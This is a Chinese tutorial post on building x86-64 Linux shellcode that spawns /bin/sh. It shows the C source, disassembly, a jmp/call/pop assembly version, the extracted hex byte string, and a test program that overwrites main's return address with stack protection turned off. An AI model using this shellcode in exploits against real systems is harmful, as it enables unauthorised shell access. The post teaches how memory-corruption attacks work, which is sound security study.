黑客攻防入门(二)shellcode构造

2023-11-15

1. 概说

shell我们都知道是什么了吧! 狭义的shellcode 就是一段可以运行shell的代码!

构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖掉正常的返回地址。

shellcode通常放在缓冲区内,也可以通过环境变量存入堆内,也可以通过动态内存放入堆区。

下面我们学习一下怎样构造shellcode。

注意: 我是在Centos 64位的系统下进行测试和构建shellcode的,shellcode的高级技巧可以支持不同平台的移植,但下面构建的shellcode并不适合多平台。

2. shellcode源代码

下面是shellcode的c代码

#include <stdio.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
    char *code[2];
    code[0] = "/bin/sh";
    code[1] = NULL;

    execve(code[0], code, NULL);

    return 0;
}

以上代码编译运行可以得到一个shell(命令行)。

  1. execve 是 Unix/Linux下exec函数,Linux一般是用fork创建新进程,用exec来执行新的程序
  2. exec有六个函数,其中只有execve是系统调用,其它五个exec函数最后都要调用execve。

3. 反汇编

我们将上面的代码进行编译,然后反汇编。

编译: gcc -o shellcode shellcode.c
反汇编:objdump -d shellcode > shellcode.s

shellcode.s 是我们得到的反汇编代码, 我们只需要关注main部分的:

0000000000400530 <main>:
  400530:       55                      push   %rbp
  400531:       48 89 e5                mov    %rsp,%rbp
  400534:       48 83 ec 20             sub    $0x20,%rsp
  400538:       89 7d ec                mov    %edi,-0x14(%rbp)
  40053b:       48 89 75 e0             mov    %rsi,-0x20(%rbp)
  40053f:       48 c7 45 f0 00 06 40    movq   $0x400600,-0x10(%rbp)
  400546:       00 
  400547:       48 c7 45 f8 00 00 00    movq   $0x0,-0x8(%rbp)
  40054e:       00 
  40054f:       48 8b 45 f0             mov    -0x10(%rbp),%rax
  400553:       48 8d 4d f0             lea    -0x10(%rbp),%rcx
  400557:       ba 00 00 00 00          mov    $0x0,%edx
  40055c:       48 89 ce                mov    %rcx,%rsi
  40055f:       48 89 c7                mov    %rax,%rdi
  400562:       e8 b9 fe ff ff          callq  400420 <execve@plt>
  400567:       b8 00 00 00 00          mov    $0x0,%eax
  40056c:       c9                      leaveq
  40056d:       c3                      retq
  40056e:       66 90                   xchg   %ax,%ax

参照上面的反汇编代码,我们手工用汇编语言重写上面的shellcode.c,如下:

.section .text
.global _start
_start:
jmp     cl
pp: popq %rcx
pushq   %rbp
mov     %rsp, %rbp
subq    $0x20, %rsp
movq    %rcx, -0x10(%rbp)
movq    $0x0,-0x8(%rbp)
mov     $0, %edx
lea     -0x10(%rbp), %rsi
mov     -0x10(%rbp), %rdi
mov     $59, %rax
syscall
cl:call pp
.ascii "/bin/sh"

上面的汇编代码,我们保存为文件: scode.s

shellcode的模板一般都是这样的:
jmp xxx
pop xxx
xxxxxxxx
call pop address
.string

这里面的一个jmp和一个call首尾呼应,是shellcode用来得到.string里面内容的一个好办法

想要编写shellcode,就要理解目的程序调用shellcode时的难点,下面是上面的汇编代码的解释:

shellcode最麻烦的一点就是要将字符串“/bin/sh”作为参数传递,shellcode被写入缓冲区后,代码的位置是不固定的,为了能够得到”/bin/sh”这个字符串,黑客们利用call指令,因为call指令执行的第一个动作就是将下一条指令的地址压栈,我们把字符串安排在call后,目的就是要把它压入栈中。

  1. scode.s入口第一条指令: jmp cl #这是跳到cl标签处,亦即 call pp。
  2. call pp #将字符串压栈,同时返回到上面pp标签处
  3. popq %rcx #将字符串”/bin/sh”的地址存入rcx(通用寄存器),这里可以选择其它寄存器。
  4. 接下来的三条指令是建立一个新的栈空间:
                        pushq %rbp
                        mov %rsp, %rbp
                        subq $0x20, %rsp
    在真正注入的shellcode代码里,可以不用创建这个栈,但这里演示程序在单独执行时,”/bin/sh”字符串是放在了代码段里,是不允许修改的空间,所以要建栈将这个字符串复制过去。

  5. movq %rcx, -0x10(%rbp)   #将字符串复制到栈

  6. movq $0x0,-0x8(%rbp)   #创建调用exec时的参数name[1],将它置0.
  7. lea -0x10(%rbp), %rsi   #这是execve第二个参数,它需要**类型,所以用lea传送地址给rsi。
  8. mov -0x10(%rbp), %rdi   #mov将字符串传给rdi,这是execve第一个参数。
  9. mov $59, %rax   #这个59是execve的系统调用号,在/usr/include/asm/unistd_64.h里可以查询到.
  10. syscall       #系统调用, 这个可以取代 int 0x80 .

不用考虑返回退出,代码基本无问题,下面进行编译和连接。

编译:  as -o scode.o scode.s
连接:  ld -o scode scode.o
用objdump反汇编scode,主要目的是提取二进制机器码,为了方便显示,二进制一般表示为十六进制。
这里有一条命令,可以直接输出到可以用在c语言的shellcode:

for i in $(objdump -d scode | grep “^ ” |cut -f2); do echo -n ‘\x’$i; done;

最后得到的shellcode代码如下:

\xeb\x2b\x59\x55\x48\x89\xe5\x48\x83\xec\x20\x48\x89\x4d\xf0\x48\xc7\x45\xf8\x00\x00\x00\x00\xba\x00\x00\x00\x00\x48\x8d\x75\xf0\x48\x8b\x7d\xf0\x48\xc7\xc0\x3b\x00\x00\x00\x0f\x05\xe8\xd0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68

4. 测试shellcode

下是用c语言写一个测试shellcode的程序:

#include <stdio.h>

unsigned char code[] =  "\xeb\x2b\x59\x55\x48\x89\xe5\x48"
                        "\x83\xec\x20\x48\x89\x4d\xf0\x48"
                        "\xc7\x45\xf8\x00\x00\x00\x00\xba"
                        "\x00\x00\x00\x00\x48\x8d\x75\xf0"
                        "\x48\x8b\x7d\xf0\x48\xc7\xc0\x3b"
                        "\x00\x00\x00\x0f\x05\xe8\xd0\xff"
                        "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"
; /*  code 就是我们上面构造的 shellcode */

void main(int argc, char *argv[])
{
    long *ret;
    ret = (long *)&ret + 2;
    (*ret) = (long)code;
}
  1. 因为是64位系统,地址是有64位宽度的,所以要用long类型
  2. ret 作为main的第一个局部变量,它必定是存储在main的栈空间内,其中long * ret 这条指令占据了一个64位, 当ret地址加1(64位)时,ret就到到达栈的基址位置(rbp),我在(一)这文章里分析过,main函数的返回地址还在栈基址之上的高地址中,它距离rbp还有64位宽度,所以ret需要加上2(2个64位)才能到达main的返回地址的保存位置。
  3. (*ret) = (long)code , 很明显就是要用code的地址将main返回地址覆盖。

另外,由于系统设置了堆栈运行保护,gcc编译时需要使用参数:-fno-stack-protector -z execstack

5. shellcode 之后

shellcode 除了取得shell外,还有很多不同的功能,构建shellcode还有很多不同的方法,这里只是很基本的方法。

现代系统都有堆栈运行保护,有方法可以绕过这些保护不?

答案是有的,所谓道高一尺,魔高一丈!

上面的shellcode并不涉及缓冲区溢出,亦不适用缓冲区溢出,原因是什么呢?

且看下回分解。

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

黑客攻防入门(二)shellcode构造 的相关文章

随机推荐

  • Wlan——锐捷智分网络解决方案及其配置

    目录 智分解决方案 一代智分解决方案 二代智分解决方案 三代智分解决方案 智分 解决方案 技术原理 隧道建立 智分 方案的配置 配置基础信息 配置微AP的无线信号 调整微AP的射频参数 宿舍场景特点 房间小 单个房间用户少 房间密集 房间之
  • Java中集合接口Collection,集合List,Set

    集合的特点 1 集合的长度是可变的 2 集合只能存储对象 3 集合不可以存储基本数据类型 数组与集合的区别 1 数组的长度是固定的 集合的长度是可变的 2 数组只能存储基本数据类型 集合只能存储对象 注意 Java中集合接口和实现类都位于j
  • jenkins学习系列之PMD静态代码检测

    一 jenkins集成PMD流程 实际生产中 上线的代码往往要经过检测 满足一些规则才行 这些规则可以是直接使用官方的规则 也可以是自己写的 因为目前的工作和java有关 所以这里以java代码静态检测 PMD为例子来进行讲解 这里PMD是
  • mysql sql语句太长_MySQL SQL语句过长引起的问题

    我现在做数据统计 后台数据库用的是MySQL 有一个常用的需求 查询未订购用户的访问PV 用户唯一性标识是用户手机号 第一种写法 SELECT COUNT 1 FROM day resinlog 2012 06 12 WHERE mobil
  • 【数据结构】线性结构—循环队列及其基本操作

    通过顺序表存储队列 当入队时队尾指针 1 出队时队头指针也 1 通过取余运算使队头指针和队尾指针在顺序表的表头和表尾移动以实现循环 当队为空队时候 队头指针和队尾指针都指向同一个位置 当队非空的时候队尾指针指向队尾元素的下一位 那么若队满的
  • sql语句查询重复的数据

    查找所有重复标题的记录 SELECT FROM t info a WHERE SELECT COUNT FROM t info WHERE Title a Title gt 1 ORDER BY Title DESC 一 查找重复记录 1
  • PMBOK(第六版) PMP笔记——《第十章 项目沟通管理》

    第十章 项目沟通管理 PM 大多数时间都用在与干系人的沟通上 第十章有三个过程 规划沟通管理 根据干系人的需求 制定沟通管理计划 管理沟通 根据沟通管理计划发布 收集 处理信息 监督沟通 确保在正确时间将正确信息传递给正确的人 1 10 1
  • 花生壳内网穿透+Windows系统,如何搭建网站?

    1 准备工作 在百度搜索 Win7下安装Apache PHP MySQL 根据搜到的教程自行安装WAMP环境 如果在网页上键入http 127 0 0 1 nbsp 出现以下页面表示您的服务器已经建好 下一步就是关键 如何通过花生壳内网穿透
  • 大家平时天天说的分布式系统到底是什么东西

    V xin ruyuanhadeng获得600 页原创精品文章汇总PDF 目录 从单块系统说起 团队越来越大 业务越来越复杂 分布式出现 庞大系统分而治之 分布式系统所带来的技术问题 一句话总结 什么是分布式系统设计和开发经验 补充说明 中
  • 【死磕 NIO】— ServerSocketChannel 的应用实例

    大家好 我是大明哥 一个专注于 死磕 Java 的程序员 死磕 Java 系列为作者 chenssy 倾情打造的 Java 系列文章 深入分析 Java 相关技术核心原理及源码 死磕 Java https www cmsblogs com
  • java大数据开发训练营--Java Web 后端技术基础(下)之Spring IOC控制反转

    一 Spring概述 1 1 Spring是什么 Spring是分层的 Java SE EE应用 full stack 全栈式 轻量级开源框架 提供了表现层 SpringMVC和持久层 Spring JDBC Template以及 业务层
  • 目标检测 3—— 人脸检测

    笔记来源 DeepLearning 500 questions 上次学习了目标检测的基本概念 Two Stage和 One Stage 算法 1 目标检测Two Stage 2 目标检测One Stage 4 人脸检测 在目标检测领域可以划
  • rk3368 Android9.0 HIDL调试记录

    rk3368 Android9 0 HIDL调试记录 Platform RK3368 OS Android 9 0 Kernel 4 4 194 文章目录 rk3368 Android9 0 HIDL调试记录 1 使用hidl gen工具生
  • AD使用插件生成交互式BOM

    AD使用插件生成交互式BOM 1 下载AD用交互式BOM插件 首先前往GitHub下载这位大佬开发的插件 地址 https github com lianlian33 InteractiveHtmlBomForAD 下载完成后打开文件所在位
  • 请实现一个简单的网页计算器(vue)

    练习一下父组件向子组件传值 计算部分用eval方法实现 运行截图如下 话不多说 上代码 页面结构 div div
  • JAVA08_Stream流anyMatch和allMatch和noneMatch的区别

    allMatch全匹配 判断数据列表中全部元素都符合设置的predicate条件 如果是就返回true 否则返回false 流为空时总是返回true 接口定义 boolean allMatch Predicate
  • 【华为】Redis客户端API使用(java)

    1 概述 目标读者 本文档专供需要Redis客户端API调用的开发人员 适用于具备Java开发经验的开发人员 简介 Redis客户端通过API调用 向Redis发起命令调用 向Redis或写入或读出数据 基本概念 Redis服务端 提供服务
  • 计算机cpi的公式,EAC=BAC/CPI;EAC=AC+( BAC-EV)/CPI公式分别在什么情况下使用?

    EAC BAC CPI EAC AC BAC EV CPI公式分别在什么情况下使用 来源 信管网 2018年10月30日 所有评论 横渡大漠 cnitpm com 08 21 35 帮忙解释一下 什么情况下用EAC BAC CPI 算 什么
  • 木兰开源社区分论坛

    ChinaOSC 2022 木兰开源社区 技术论坛将于 2022年8月21日15 00 17 30 在陕西省西安高新国际会议中心 会议室 召开 聚焦开源许可证与标准 探索开源发展模式 为国内开源产业打地基 木兰开源社区做了什么 还要怎么做
  • 黑客攻防入门(二)shellcode构造

    1 概说 shell我们都知道是什么了吧 狭义的shellcode 就是一段可以运行shell的代码 构造一段shellcode的作用就是为了在缓冲区溢出时将shellcode的地址覆盖掉正常的返回地址 shellcode通常放在缓冲区内